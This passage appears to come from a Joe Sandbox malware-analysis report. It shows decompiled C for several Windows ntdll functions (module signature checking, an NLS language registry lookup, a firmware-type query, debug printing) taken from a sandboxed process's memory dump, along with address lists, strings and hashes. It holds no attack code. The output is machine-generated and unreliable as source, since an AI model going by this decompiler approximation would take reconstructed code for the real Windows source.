					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0335C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3445780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E033D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3445780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03377D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03377D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E033D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03377D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03377D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E033D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0338A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0335B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                0x03367e4c
                0x03367e50
                0x03367e55
                0x03367e58
                0x03367e5d
                0x03367e71
                0x03367f33
                0x03367e77
                0x03367e77
                0x03367e79
                0x03367e79
                0x03367e7e
                0x03367f45
                0x033b9848
                0x00000000
                0x033b9848
                0x03367f4e
                0x03367f53
                0x03367f5a
                0x00000000
                0x00000000
                0x033b985a
                0x033b9862
                0x033b9866
                0x00000000
                0x033b986c
                0x00000000
                0x033b986c
                0x03367e84
                0x03367e84
                0x03367e8d
                0x033b9871
                0x03367eb8
                0x03367ec0
                0x03367ec0
                0x03367e9a
                0x033b987e
                0x00000000
                0x00000000
                0x033b9884
                0x033b988b
                0x033b98a7
                0x033b98ac
                0x033b98b1
                0x033b98b6
                0x033b98b8
                0x033b98b8
                0x033b98b9
                0x00000000
                0x033b98b9
                0x03367ea0
                0x03367ea7
                0x00000000
                0x00000000
                0x03367eac
                0x03367eb1
                0x03367ec6
                0x03367ed0
                0x033b98cc
                0x03367ed6
                0x03367ed6
                0x03367ed6
                0x03367ede
                0x03367ee3
                0x033b98e3
                0x033b98f0
                0x033b9902
                0x033b98f2
                0x033b98fb
                0x033b98fb
                0x033b9907
                0x033b991d
                0x033b991d
                0x033b9907
                0x033b98e3
                0x03367ef0
                0x03367f14
                0x03367f14
                0x03367f1e
                0x033b9946
                0x03367f24
                0x03367f24
                0x03367f24
                0x03367f2c
                0x033b996a
                0x033b9975
                0x033b9975
                0x033b997e
                0x033b9993
                0x033b9993
                0x033b997e
                0x00000000
                0x03367ef2
                0x03367efc
                0x03367f0a
                0x03367f0e
                0x033b9933
                0x00000000
                0x033b9933
                0x00000000
                0x03367f0e
                0x00000000
                0x00000000
                0x00000000
                0x03367eb1

                Strings
                • Could not validate the crypto signature for DLL %wZ, xrefs: 033B9891
                • minkernel\ntdll\ldrmap.c, xrefs: 033B98A2
                • LdrpCompleteMapModule, xrefs: 033B9898
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                • API String ID: 0-1676968949
                • Opcode ID: 69034a6a1836b2d8ab07b64dec80bb6b5d6ceb67c42dc5146e08aad1cb9795b9
                • Instruction ID: 6777c02de86f6503bbccec14d8918578946fa6ca3a8d4b61eebf0096b33ab7fa
                • Opcode Fuzzy Hash: 69034a6a1836b2d8ab07b64dec80bb6b5d6ceb67c42dc5146e08aad1cb9795b9
                • Instruction Fuzzy Hash: 5F510231A007419FDB21CB68CDC4B6AB7F8AB01718F4846A9EA51DBBE5D734ED04C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0335E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0335F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E033995D0();
						}
						if(_t78 != 0) {
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0339FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0339BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03399600();
					if(_t97 < 0) {
						goto L6;
					}
					E0339BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0335F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0339BB40(_t83, _t102 + 0x24, _t78);
								if(L033643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0339BB40(_t84, _t102 + 0x24, _t94);
									if(L033643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                0x0335e620
                0x0335e628
                0x0335e62f
                0x0335e631
                0x0335e635
                0x0335e637
                0x0335e63e
                0x033b5503
                0x033b5503
                0x0335e64c
                0x0335e64c
                0x0335e651
                0x00000000
                0x00000000
                0x0335e661
                0x0335e665
                0x033b542a
                0x0335e715
                0x0335e71a
                0x0335e71c
                0x0335e720
                0x0335e720
                0x0335e727
                0x0335e736
                0x0335e736
                0x0335e743
                0x0335e743
                0x0335e673
                0x0335e678
                0x0335e67d
                0x0335e682
                0x0335e685
                0x0335e692
                0x0335e69b
                0x0335e6a3
                0x0335e6ad
                0x0335e6b1
                0x0335e6b2
                0x0335e6bb
                0x0335e6bf
                0x0335e6c0
                0x0335e6c8
                0x0335e6cc
                0x0335e6d5
                0x0335e6d9
                0x00000000
                0x00000000
                0x0335e6e5
                0x0335e6ea
                0x0335e6f9
                0x0335e70b
                0x0335e70f
                0x033b5439
                0x033b545e
                0x033b545e
                0x00000000
                0x033b545e
                0x033b543b
                0x033b543e
                0x033b5440
                0x033b5445
                0x033b5472
                0x033b5475
                0x033b548d
                0x033b5493
                0x033b54a9
                0x00000000
                0x00000000
                0x033b54ab
                0x033b54b4
                0x033b54bc
                0x033b54c8
                0x033b54de
                0x033b54fb
                0x033b54e0
                0x033b54e6
                0x033b54eb
                0x033b54eb
                0x033b54de
                0x00000000
                0x033b54bc
                0x033b5477
                0x033b547a
                0x033b5480
                0x033b5483
                0x033b5486
                0x033b548b
                0x00000000
                0x00000000
                0x00000000
                0x033b548b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x033b5447
                0x033b5447
                0x033b5447
                0x033b5447
                0x033b544e
                0x00000000
                0x00000000
                0x033b5450
                0x033b5452
                0x033b5455
                0x033b545a
                0x00000000
                0x00000000
                0x00000000
                0x033b545c
                0x033b546a
                0x033b546d
                0x033b546f
                0x00000000
                0x033b546f
                0x0335e70f

                Strings
                • InstallLanguageFallback, xrefs: 0335E6DB
                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0335E68C
                • @, xrefs: 0335E6C0
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                • API String ID: 0-1757540487
                • Opcode ID: 2caa95b195dc5cf2ed4e46e86536781a9037aba7198b0eda88b722e10500730e
                • Instruction ID: 932bc76ff97626a729150e4b07f2b38cdda4273812b00fc86b5a7ed51a9bb0bb
                • Opcode Fuzzy Hash: 2caa95b195dc5cf2ed4e46e86536781a9037aba7198b0eda88b722e10500730e
                • Instruction Fuzzy Hash: 2E51D2769043459BE714DF25C8C0ABBB3E8BF89614F09096EF985D7640FB34DA44C7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E033D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x34305f0);
				E033AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E033D53CA(0);
						return E033AD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0339F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03373690(1, _t117, 0x3331810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0339AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03374620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0339AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E033D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03399860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                0x033d51be
                0x033d51c3
                0x033d51c8
                0x033d51cd
                0x033d51d0
                0x033d51d3
                0x033d51d8
                0x033d51db
                0x033d51de
                0x033d51e0
                0x033d51e3
                0x033d51e6
                0x033d51e8
                0x033d5342
                0x033d5351
                0x033d5356
                0x033d535a
                0x033d5360
                0x033d5363
                0x033d5366
                0x033d5369
                0x033d5369
                0x033d536b
                0x033d536b
                0x033d5370
                0x033d53a3
                0x033d53a4
                0x033d53a6
                0x033d53ab
                0x033d53ab
                0x033d53ae
                0x033d53ae
                0x033d53b5
                0x033d53bf
                0x033d53bf
                0x033d5375
                0x033d5396
                0x033d53a0
                0x033d53a0
                0x00000000
                0x033d5396
                0x033d5377
                0x033d5379
                0x033d537f
                0x033d538c
                0x033d5390
                0x00000000
                0x033d5390
                0x033d51ee
                0x033d51f1
                0x033d5301
                0x033d5310
                0x033d5315
                0x033d5318
                0x033d531b
                0x033d5320
                0x033d532e
                0x033d5331
                0x00000000
                0x033d5331
                0x033d5328
                0x033d5329
                0x00000000
                0x033d5329
                0x033d51fa
                0x033d5235
                0x033d5236
                0x033d5239
                0x033d523f
                0x033d5240
                0x033d5241
                0x033d5242
                0x033d5246
                0x033d5247
                0x033d524e
                0x033d5251
                0x033d5267
                0x033d5269
                0x033d526e
                0x033d527d
                0x033d527e
                0x033d5281
                0x033d5282
                0x033d5287
                0x033d5288
                0x033d528a
                0x033d528f
                0x033d5294
                0x00000000
                0x00000000
                0x033d529a
                0x033d529c
                0x033d529e
                0x033d529e
                0x033d52a4
                0x033d52b0
                0x00000000
                0x00000000
                0x033d52ba
                0x033d52bc
                0x033d52bc
                0x033d52d4
                0x033d52d9
                0x033d52dc
                0x033d52e1
                0x00000000
                0x00000000
                0x033d52e7
                0x033d52f4
                0x00000000
                0x033d52f4
                0x033d5270
                0x00000000
                0x033d5270
                0x033d51fc
                0x033d51fd
                0x033d5202
                0x033d5203
                0x033d5205
                0x033d520a
                0x033d520f
                0x00000000
                0x00000000
                0x033d521b
                0x033d5226
                0x033d522b
                0x033d521d
                0x033d521d
                0x033d5222
                0x033d5222
                0x033d522d
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: 3e2990f24c2beeb80932a3b12f4e6ee15b402c38ace8a6f11bece081b53d2fbc
                • Instruction ID: f84b082680cd5e1a73f198dce6d57aacb41c9bc161d4629a3b1e92f52ad6c63e
                • Opcode Fuzzy Hash: 3e2990f24c2beeb80932a3b12f4e6ee15b402c38ace8a6f11bece081b53d2fbc
                • Instruction Fuzzy Hash: A2515AB6E007089FEB24DFA89880BAEBBB8FB49700F14402DE559EB651D771D900CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 78%
                			E0335B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x342f7a8);
				E033AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E033AD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0339D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0339F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L033ADEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0339B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0339B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0339E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0339A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                0x0335b171
                0x0335b171
                0x0335b171
                0x0335b171
                0x0335b171
                0x0335b176
                0x0335b17b
                0x0335b180
                0x0335b186
                0x0335b18f
                0x0335b198
                0x0335b1a4
                0x0335b1aa
                0x033b4802
                0x033b4802
                0x033b4805
                0x033b480c
                0x033b480e
                0x0335b1d1
                0x0335b1d3
                0x0335b1de
                0x0335b1de
                0x033b4817
                0x033b481e
                0x033b4820
                0x033b4822
                0x033b4822
                0x033b4824
                0x033b4824
                0x033b482a
                0x00000000
                0x00000000
                0x033b4835
                0x033b483a
                0x033b483d
                0x033b483f
                0x033b4842
                0x033b4842
                0x033b4842
                0x033b4846
                0x033b484c
                0x033b484e
                0x033b4851
                0x033b4851
                0x033b4853
                0x033b4854
                0x033b4854
                0x033b4858
                0x033b485a
                0x033b485a
                0x033b485d
                0x033b485f
                0x033b4861
                0x033b4861
                0x033b4866
                0x033b486b
                0x033b486e
                0x033b4871
                0x033b4876
                0x033b4876
                0x033b4878
                0x033b487b
                0x033b4884
                0x033b4884
                0x00000000
                0x033b487d
                0x033b487d
                0x033b4882
                0x033b4889
                0x033b4889
                0x033b488f
                0x033b4891
                0x033b48e0
                0x033b48e2
                0x033b48e4
                0x033b48e4
                0x033b48e7
                0x033b48e7
                0x033b48ed
                0x033b48f4
                0x033b48f6
                0x033b4951
                0x033b4951
                0x033b4953
                0x033b4953
                0x033b4956
                0x033b4956
                0x033b4958
                0x033b4959
                0x033b4959
                0x033b495d
                0x033b495d
                0x033b495f
                0x033b495f
                0x033b4965
                0x033b4969
                0x033b49ba
                0x033b49ba
                0x033b49c1
                0x033b49c5
                0x033b49cc
                0x033b49d4
                0x033b49d7
                0x033b49da
                0x033b49e4
                0x033b49e5
                0x033b49f3
                0x033b4a02
                0x00000000
                0x033b4a02
                0x033b4972
                0x033b4974
                0x00000000
                0x00000000
                0x033b4976
                0x033b4979
                0x033b4982
                0x033b4983
                0x033b4984
                0x033b498b
                0x033b498d
                0x033b4991
                0x033b4993
                0x033b4999
                0x033b499d
                0x033b49a2
                0x033b49a2
                0x033b49a2
                0x033b4999
                0x033b49ac
                0x00000000
                0x033b49b3
                0x033b48f8
                0x033b48fe
                0x00000000
                0x00000000
                0x00000000
                0x033b48fe
                0x033b4895
                0x033b489c
                0x033b48ad
                0x033b48b2
                0x033b48b5
